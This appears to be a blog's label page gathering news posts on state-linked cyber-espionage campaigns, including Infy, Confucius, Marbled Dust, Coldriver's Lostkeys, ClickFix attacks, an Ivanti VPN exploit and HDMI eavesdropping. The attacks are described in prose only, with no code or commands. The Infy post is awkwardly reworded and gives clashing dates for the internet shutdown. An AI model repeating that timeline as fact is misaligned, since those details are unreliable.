Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label espionage. Show all posts
I fy
AI Cloud Cyber Crime Data espionage I fy

Infy Hackers Strike Again With New C2 Servers After Iran's Internet Shutdown Ends


Infy group's new attack tactic 

An Iranian hacking group known as Infy (aka Prince of Persia) has advanced its attack tactics to hide its operations. The group also made a new C2 infrastructure while there was a wave of internet shutdown imposed earlier this year. The gang stopped configuring its C2 servers on January 8 when experts started monitoring Infy. 

In reaction to previous protests, Iranian authorities implemented a nationwide internet shutdown on this day, which probably indicates that even government-affiliated cyber units did not have the internet. 

About the campaign 

The new activity was spotted on 26 January 2026 while the gang was setting up its new C2 servers, one day prior to the Iranian government’s internet restrictions. This suggests that the threat actor may be state-sponsored and supported by Iran. 

Infy is one of the many state-sponsored hacking gangs working out of Iran infamous for sabotage, spying, and influence campaigns coordinated with Tehran’s strategic goals. However, it also has a reputation for being the oldest and less famous gangs staying under the radar and not getting caught, working secretly since 2004 via “laser-focused” campaigns aimed at people for espionage.

The use of modified versions of Foudre and Tonnerre, the latter of which used a Telegram bot probably for data collection and command issuance, were among the new tradecraft linked to the threat actor that SafeBreach revealed in a report released in December 2025. Tornado is the codename for the most recent version of Tonnerre (version 50).

The report also revealed that threat actors replaced the C2 infrastructure for all variants of Tonnerre and Foudre and also released Tornado variant 51 that employs both Telegram and HTTP for C2.

It generates C2 domain names using two distinct techniques: a new DGA algorithm initially, followed by fixed names utilizing blockchain data de-obfuscation. We believe that this novel method offers more flexibility in C2 domain name registration without requiring an upgrade to the Tornado version.

Experts believe that Infy also abused a 1-day security bug in WinRAR to extract the Tornado payload on an infected host to increase the effectiveness of its attacks. The RAR archives were sent to the Virus Total platform from India and Germany in December 2025. This means the two countries may have been victims. 



Read more »
Windows
AnonDoor Confucius espionage malware Windows

Confucius Espionage: Gang Hijacks to Attack Windows Systems Via Malware


Confucius gang strikes again

The Confucius hacking gang, infamous for its cyber-espionage operations and alleged state-sponsored links, has advanced its attack tactics in recent times, shifting from document stealers such as WooperStealer to advanced Python-based backdoors like AnonDoor malware. 

The testimony to this is the December 2024 campaign, which showed the gang’s highly advanced engineering methods, using phishing emails via malicious PowerPoint presentations (Document.ppsx) that showed "Corrupted Page” notification to victims. 

Attack tactic

“The group has demonstrated strong adaptability, layering obfuscation techniques to evade detection and tailoring its toolset to align with shifting intelligence-gathering priorities. Its recent campaigns not only illustrate Confucius’ persistence but also its ability to pivot rapidly between techniques, infrastructure, and malware families to maintain operational effectiveness,” FortiGuard Labs said.

The infected file consisted of embedded OLE objects that prompted a VBScript command from remote infrastructure, starting a malicious chain.

FortiGuard Labs discovered how this gang has attacked Office documents and infected LNK files to damage Windows systems throughout the South Asian region, including organizations in Pakistan. The attack tactic uses DLL side-loading; the malware imitates genuine Windows commands such as fixmapi.exe, to user directories for persistence. 

About LNK-based attacks

Earlier this year, Confucius moved to disguise infected LNK files as genuine documents such as “Invoice_Jan25.pdf.lnk.” These documents trigger PowerShell commands that install an infected DLL and fake PDF documents via remote servers, creating a disguised, authentic file access while building backdoor access.

These files execute PowerShell commands that download malicious DLLs and decoy PDF documents from remote servers, maintaining the illusion of legitimate file access while establishing backdoor access. The downloaded DLL makes persistence channels and creates Base64-coded remote host addresses for payload deployment. 

Findings

The study found that the final payload remained WooperStealer, modified to extract different file types such as archives, images, documents, and email files with different extensions.

One major development happened in August 2025 with AnonDoor, an advanced Python-based backdoor, different from older NET-based tools.

Plan forward

According to Fortinet, “the layered attack chain leverages encoded components, DLL side-loading, and scheduled task persistence to secure long-term access and exfiltrate sensitive data while minimizing visibility.” 

Organizations are advised to be vigilant against different attack tactics, as cyber criminal gangs keep evolving their methods to escape detection. 

Read more »
zero-day
Cyber Security DNS espionage Iraq MarbledDust OutputMessenger threatgroup Turkey Vulnerability zero-day

Türkiye-Linked Hackers Exploit Zero-Day in Messaging App to Target Kurdish Military

 


 
A Türkiye-aligned cyberespionage group, Marbled Dust, has exploited a previously unknown zero-day vulnerability to launch attacks on users of Output Messenger — specifically those associated with the Kurdish military in Iraq, according to a report from Microsoft Threat Intelligence.

The uncovered flaw, now identified as CVE-2025-27920, is a directory traversal vulnerability in the LAN-based Output Messenger application. It enables authenticated users to break out of intended directories, granting access to sensitive system files or allowing the deployment of malicious payloads to the server’s startup folder.

"Attackers could access files such as configuration files, sensitive user data, or even source code, and depending on the file contents, this could lead to further exploitation, including remote code execution," Srimax, the app's developer, stated in a security advisory released in December.

The vulnerability was patched in Output Messenger V2.0.63, but attackers exploited it before updates were applied. Microsoft attributes the campaign to a group tracked as Sea Turtle, SILICON, and UNC1326, known collectively as Marbled Dust.

After infiltrating the Output Messenger Server Manager, attackers installed malware that allowed them to monitor communications, impersonate users, and disrupt internal systems.

"While we currently do not have visibility into how Marbled Dust gained authentication in each instance, we assess that the threat actor leverages DNS hijacking or typo-squatted domains to intercept, log, and reuse credentials, as these are techniques leveraged by Marbled Dust in previously observed malicious activity," Microsoft explained.

Following initial compromise, a backdoor named OMServerService.exe was deployed to establish communication with an attacker-controlled command-and-control server (api.wordinfos[.]com). This enabled the group to gather victim-specific data.

In one example, an Output Messenger client connected to an IP tied to Marbled Dust, likely initiating data exfiltration. Shortly after, the system began collecting files and compressing them into a RAR archive for extraction.

Marbled Dust has a history of targeting Europe and the Middle East, especially telecom, IT firms, and government entities critical of the Turkish regime. The group is known to exploit internet-facing vulnerabilities and compromise DNS registries to carry out man-in-the-middle (MitM) attacks.

"This new attack signals a notable shift in Marbled Dust's capability while maintaining consistency in their overall approach," Microsoft noted. "The successful use of a zero-day exploit suggests an increase in technical sophistication and could also suggest that Marbled Dust's targeting priorities have escalated or that their operational goals have become more urgent."

In recent years, Marbled Dust has been connected to espionage campaigns in the Netherlands, with a focus on ISPs, telecommunication provi
Read more »
Russian Hackers
COLDRIVER Coldriver hacker group Cyber Attacks cyber espionage data security espionage Hacker attack Malware Attack Malwares Russian Hackers

Lostkeys Malware: Russian Group Coldriver Targets Western Officials in Espionage Campaign

 

A new wave of cyber espionage has emerged, with Russian hackers deploying a sophisticated malware strain known as “Lostkeys” to infiltrate the systems of Western officials, journalists, and NGOs. According to researchers from Google’s Threat Intelligence Group, the malware is linked to Coldriver, also known as UNC4057, Star Blizzard, or Callisto—a threat actor believed to be part of Russia’s Federal Security Service (FSB), the successor to the KGB. 

Coldriver has traditionally been involved in phishing operations to steal credentials, but the emergence of Lostkeys demonstrates a significant leap in their cyber capabilities. Lostkeys appears to mark a shift in strategy for the group, moving beyond phishing and into deeper system infiltration. The malware is deployed in a targeted manner, reserved for high-value individuals such as political advisors, think tank members, journalists, and people with known connections to Ukraine.

Activity related to Lostkeys was observed by Google in the early months of 2024—specifically January, March, and April—with evidence suggesting its use might have started as far back as December 2023. The attack begins with a deceptive Captcha page, tricking victims into copying a malicious PowerShell script into the Windows Run dialog. This method, known as “ClickFix,” bypasses typical security filters and exploits user behavior rather than software vulnerabilities. 

Once executed, the script connects to a command-and-control server, downloading a series of payloads uniquely tailored to each victim. In an effort to avoid detection, the malware includes anti-sandbox measures. During the second stage of infection, the script checks the screen resolution of the host machine and halts if it matches known virtual machine environments used by analysts and cybersecurity researchers. If the device passes this check, the malware proceeds to the final stage—a Visual Basic Script that steals data, including specific file types, system details, and active processes. These are exfiltrated back to the attackers using an encoded system that applies a unique two-key substitution cipher for each infected machine. 

Lostkeys appears to be a more refined successor to a previous malware strain known as Spica, which Coldriver also deployed in 2024. While both strains focus on data exfiltration, Lostkeys features a more intricate delivery system and improved obfuscation techniques. Some earlier samples of Lostkeys mimicked legitimate software like Maltego and used executable files instead of PowerShell, though Google has not confirmed if these instances were part of the same campaign or the work of a different threat actor reusing Coldriver’s tactics. 

This development highlights an alarming evolution in state-backed cyber operations, where advanced social engineering and stealth techniques are being increasingly used to infiltrate high-profile targets. As geopolitical tensions persist, the risks posed by such targeted cyber espionage campaigns are expected to grow.
Read more »
PowerShell
Advanced persistent threat (APT) Advanced Social Engineering Cyber Attacks cyber espionage espionage Fake Website Phishing emails PowerShell

ClickFix Attacks: North Korea, Iran, Russia APT Groups Exploit Social Engineering for Espionage

ClickFix attacks are rapidly becoming a favored tactic among advanced persistent threat (APT) groups from North Korea, Iran, and Russia, particularly in recent cyber-espionage operations. This technique involves malicious websites posing as legitimate software or document-sharing platforms. Targets are enticed through phishing emails or malicious advertising and then confronted with fake error messages claiming a failed document download or access issue. 


To resolve the supposed problem, users are instructed to click a “Fix” button that directs them to run a PowerShell or command-line script. Executing this script allows malware to infiltrate their systems. Microsoft’s Threat Intelligence division highlighted earlier this year that the North Korean group ‘Kimsuky’ utilized a similar approach through a fake “device registration” page. 

A new report from Proofpoint now confirms that Kimsuky, along with Iran’s MuddyWater, Russia’s APT28, and the UNK_RemoteRogue group, deployed ClickFix techniques between late 2024 and early 2025. Kimsuky’s campaign, conducted between January and February 2025, specifically targeted think tanks involved in North Korean policy research. The attackers initially contacted victims using spoofed emails designed to appear as if they were sent by Japanese diplomats. After gaining trust, they provided malicious PDF attachments leading to a counterfeit secure drive. Victims were then asked to manually run a PowerShell command, which triggered the download of a second script that established persistence with scheduled tasks and installed QuasarRAT, all while distracting the victim with a harmless-looking PDF. 

In mid-November 2024, Iran’s MuddyWater launched its campaign, targeting 39 organizations across the Middle East. Victims received phishing emails disguised as urgent Microsoft security alerts, prompting them to run PowerShell scripts with administrative rights. This led to the deployment of ‘Level,’ a remote monitoring and management (RMM) tool used to conduct espionage activities. Meanwhile, Russian group UNK_RemoteRogue focused on two organizations tied to a leading arms manufacturer in December 2024. Attackers used compromised Zimbra servers to send fake Microsoft Office messages. Clicking the embedded links directed victims to fraudulent Microsoft Word pages featuring Russian-language instructions and a video tutorial. 

Victims executing the provided script unknowingly triggered JavaScript that ran PowerShell commands, connecting their systems to a server managed through the Empire C2 framework. Proofpoint also found that APT28, an infamous Russian cyber-espionage unit, used ClickFix tactics as early as October 2024. In that instance, phishing emails mimicked Google Spreadsheet notifications, including a fake reCAPTCHA and a prompt to execute PowerShell commands. Running these commands enabled attackers to create an SSH tunnel and activate Metasploit, providing them with covert access to compromised machines. 

The growing use of ClickFix attacks by multiple state-sponsored groups underscores the method’s effectiveness, primarily due to the widespread lack of caution when executing unfamiliar commands. To avoid falling victim, users should be extremely wary of running scripts or commands they do not recognize, particularly when asked to use elevated privileges.
Read more »
Vulnerability
China Cybersecurity espionage Ivanti malware VPN Vulnerability

Chinese Cyber Espionage Suspected in New Ivanti VPN Malware Attack

 

A newly discovered cyberattack campaign targeting Ivanti VPN devices is suspected to be linked to a Chinese cyberespionage group. Security researchers believe the attackers exploited a critical vulnerability in Ivanti Connect Secure, which was patched by the Utah-based company in February. The attack is yet another example of how state-backed Chinese threat actors are rapidly taking advantage of newly disclosed vulnerabilities and frequently targeting Ivanti’s infrastructure.

On Thursday, researchers from Mandiant revealed that a group tracked as UNC5221 exploited a stack-based buffer overflow vulnerability to deploy malicious code from the Spawn malware ecosystem—an attack technique often associated with Chinese state-sponsored activity. Mandiant also identified two previously unknown malware families, which they've named Trailblaze and Brushfire. As seen in earlier attacks tied to Chinese hackers, this group attempted to manipulate Ivanti’s internal Integrity Checker Tool to avoid detection.

The vulnerability, officially tracked as CVE-2025-22457, was used to compromise multiple Ivanti products, including Connect Secure version 22.7R2.5 and earlier, the legacy Connect Secure 9.x line, Policy Secure (Ivanti’s network access control solution), and Zero Trust Access (ZTA) gateways. Ivanti released a patch for Connect Secure on February 11, emphasizing that Policy Secure should not be exposed to the internet, and that "Neurons for ZTA gateways cannot be exploited when in production."

Ivanti acknowledged the attack in a statement: "We are aware of a limited number of customers whose appliances have been exploited." The incident follows warnings from Western intelligence agencies about China's increasing speed and aggression in leveraging newly disclosed software vulnerabilities—often before security teams have time to deploy patches.

Many of the devices targeted were legacy systems no longer receiving software updates, such as the Connect Secure 9.x appliance, which reached end-of-support on December 31, 2024. Older versions of the Connect Secure product line, which were set to be replaced by version 22.7R2.6 as of February 11, were also compromised.

This marks the second consecutive year Ivanti has had to defend its products from persistent attacks by suspected Chinese state-backed hackers. Thursday’s advisory from Mandiant and Ivanti highlights a vulnerability separate from the one flagged in late March by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), which had allowed attackers to install a Trojan variant linked to Spawn malware in Ivanti systems.
Read more »
WhatsApp
Cyber Attacks espionage Iran Israel spying surveillance Telegram WhatsApp

Iran Spies on Senior Israeli Officials, Launches Over 200 Cyberattacks

Iran Spies on Senior Israeli Officials, Launches Over 200 Cyberattacks

Shin Bet, an Israeli Cybersecurity Service said recently it discovered over 200 Iranian phishing attempts targeting top Israeli diplomats to get personal information. Shin Bet believes the attacks were launched by Iranian actors through Telegram, WhatsApp, and email. 

The threat actors tried to bait targets into downloading infected apps that would give them access to victim devices and leak personal data like location history and residential addresses.

Iran Targeting Israeli Officials

The targeted senior officials include academicians, politicians, media professionals, and others

ShinBet said the stolen information would be used by Iran to launch attacks against Israeli nationals “through Israeli cells they have recruited within the country.” The targets were reached out with an “individually tailored cover story for each victim according to their area of work, so the approach doesn’t seem suspicious.”

In one case, the attacker disguised as a Cabinet Secretary lured the target saying he wanted to coordinate with PM Benjamin Netanyahu. Shin Bet has tracked the targets involved in the campaign and informed them about the phishing attempts. 

“This is another significant threat in the campaign Iran is waging against Israel, aimed at carrying out assassination attacks. We request heightened awareness, as cyberattacks of this type can be avoided before they happen through awareness, caution, suspicion, and proper preventative behavior online,” said a Shin Bet official.

Reasons for attack

Shin Bet “will continue to act to identify Iranian activity and thwart it in advance.” It believes the motive behind the attacks was to manage future attacks on Israeli nationals using information given by Israeli cells recruited by Iran. The campaign is a sign of an escalation between Iran and Israel, the end goal being assassination attempts.

The bigger picture

The recent discovery of phishing campaigns is part of larger targeted campaigns against Israel. In September 2024, 7 Jewish Israelis were arrested for allegedly spying on IDF and Israeli security figures for Iran. 

The Times of Israel reports, “Also in September, a man from the southern city of Ashkelon was arrested on allegations that he was smuggled into Iran twice, received payment to carry out missions on behalf of Tehran, and was recruited to assassinate either Israel’s prime minister, defense minister, or the head of the Shin Bet.”

Read more »
Technology
AI Deep Learning espionage HDMI Technology

Hackers Can Now Intercept HDMI Signals Using Deep Learning

Hackers Can Now Intercept HDMI Signals Using Deep Learning

Secretly intercepting video signals is a very traditional way to do electronic spying, but experts have found a new that puts a frightening twist to it.

A team of experts from Uruguay has found that it's possible to hack electromagnetic radiation from HDMI cables and process the video via AI.

Using deep learning to trace HDMI signals

University of the Republic experts in Montevideo posted their findings on Cornell's ArXiv service. As per the findings, you can train an AI model to interpret minute fluctuations in electromagnetic radiation released from an HDMI cable. “In this work, we address the problem of eavesdropping on digital video displays by analyzing the electromagnetic waves that unintentionally emanate from the cables and connectors, particularly HDMI,” the researchers said.  Despite being a wired standard and digitally encrypted, abundant electromagnetic signals are released from these cables to track without needing direct access.

Detecting and decoding are different, but the experts also found that by pairing an AI model with text recognition software, one can "read" the wireless recorded EM radiation with a surprising 70% accuracy.

It is still distant from a traditional recording, but there's still a 60 percent improvement compared to earlier methods, making it capable of stealing passwords and other sensitive info. One can also do it wirelessly without physical access to attack a computer, from outside a building in real-life situations.

A new method for surveillance

Skimming from wireless electromagnetic signals for spying purposes isn't a new thing. It is a vulnerability called TEMPEST (Transient ElectroMagnetic Pulse Emanation Standard, a very awkward backronym) having links to espionage dating back to World War 2. 

However, because HDMI connections are digital transmissions with some kind of encryption utilizing the HDCP standard, they were not thought to be particularly vulnerable to it. The researchers' AI algorithm-assisted technique of assault (dubbed "Deep-TEMPEST") raises some troubling possibilities.

State-sponsored attacks

According to experts, the system and its related alternatives, are already in use by state-sponsored hackers and industrial espionage threat actors. The advanced nature of the methods and the need to be around the target systems suggest that they won’t cause harm to regular users. However, large businesses or government agencies should be on the lookout, to protect their sensitive data, they should consider EM-shielding measures- especially for the employees and stakeholders working from home. 

“The proposed system is based on widely available Software Defined Radio and is fully open-source, seamlessly integrated into the popular GNU Radio framework. We also share the dataset we generated for training, which comprises both simulated and over 1000 real captures. Finally, we discuss some countermeasures to minimize the potential risk of being eavesdropped by systems designed based on similar principles,” concluded experts in the report.

Read more »
Subscribe to: Comments (Atom)